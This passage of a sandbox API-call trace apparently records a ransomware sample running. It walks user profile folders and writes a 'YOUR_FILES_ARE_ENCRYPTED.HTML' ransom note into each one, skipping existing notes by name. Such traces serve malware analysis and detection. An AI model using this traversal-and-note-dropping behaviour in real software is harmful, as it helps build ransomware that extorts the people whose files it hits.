[0171.503] lstrlenW (lpString=".search-ms") returned 10 [0171.503] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0171.503] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.505] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\searches\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.508] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.511] CloseHandle (hObject=0x5a0) returned 1 [0171.511] GetProcessHeap () returned 0x270000 [0171.521] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.521] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SendTo", cAlternateFileName="")) returned 1 [0171.521] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0171.521] GetProcessHeap () returned 0x270000 [0171.521] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.521] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo") returned="\\\\?\\C:\\Users\\Default\\SendTo" [0171.522] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned="\\\\?\\C:\\Users\\Default\\SendTo\\*" [0171.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.522] GetProcessHeap () returned 0x270000 [0171.522] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.522] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x17612fdc, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x17612fdc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x17612fdc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0171.523] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0171.523] GetProcessHeap () returned 0x270000 [0171.523] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.523] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu") returned="\\\\?\\C:\\Users\\Default\\Start Menu" [0171.523] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned="\\\\?\\C:\\Users\\Default\\Start Menu\\*" [0171.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.523] GetProcessHeap () returned 0x270000 [0171.524] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.524] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0171.524] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0171.524] GetProcessHeap () returned 0x270000 [0171.524] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.524] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Templates" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates") returned="\\\\?\\C:\\Users\\Default\\Templates" [0171.524] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates\\*") returned="\\\\?\\C:\\Users\\Default\\Templates\\*" [0171.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.524] GetProcessHeap () returned 0x270000 [0171.525] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.525] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0171.525] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0171.525] GetProcessHeap () returned 0x270000 [0171.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.525] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos") returned="\\\\?\\C:\\Users\\Default\\Videos" [0171.525] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Videos\\*" [0171.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.525] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.525] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.525] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0171.525] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.526] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.526] lstrlenW (lpString=".ini") returned 4 [0171.526] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.526] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.526] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.526] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0171.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.526] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.529] CloseHandle (hObject=0x5a0) returned 1 [0171.529] GetProcessHeap () returned 0x270000 [0171.529] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.529] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0171.530] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0171.530] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 50 [0171.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0171.530] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0171.532] CloseHandle (hObject=0x4a4) returned 1 [0171.532] GetProcessHeap () returned 0x270000 [0171.533] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.536] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0171.536] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0171.536] GetProcessHeap () returned 0x270000 [0171.536] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0171.538] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0171.538] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default User", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default User\\*") returned="\\\\?\\C:\\Users\\Default User\\*" [0171.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="\㇟∄)) returned 0xffffffff [0171.538] GetProcessHeap () returned 0x270000 [0171.539] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.539] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0171.539] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.539] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.539] lstrlenW (lpString=".ini") returned 4 [0171.539] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.539] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0171.539] GetProcessHeap () returned 0x270000 [0171.539] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0171.539] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0171.539] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*") returned="\\\\?\\C:\\Users\\Public\\*" [0171.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0171.539] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.539] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0171.540] GetProcessHeap () returned 0x270000 [0171.540] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.540] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0171.540] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*" [0171.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.540] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.541] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b365a97, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.541] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0171.541] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.541] lstrlenW (lpString=".ini") returned 4 [0171.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.541] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b365a97, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.541] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.541] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0171.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.542] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.544] CloseHandle (hObject=0x5a0) returned 1 [0171.544] GetProcessHeap () returned 0x270000 [0171.545] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.545] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.545] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0171.545] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.545] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.545] lstrlenW (lpString=".ini") returned 4 [0171.545] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.545] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, 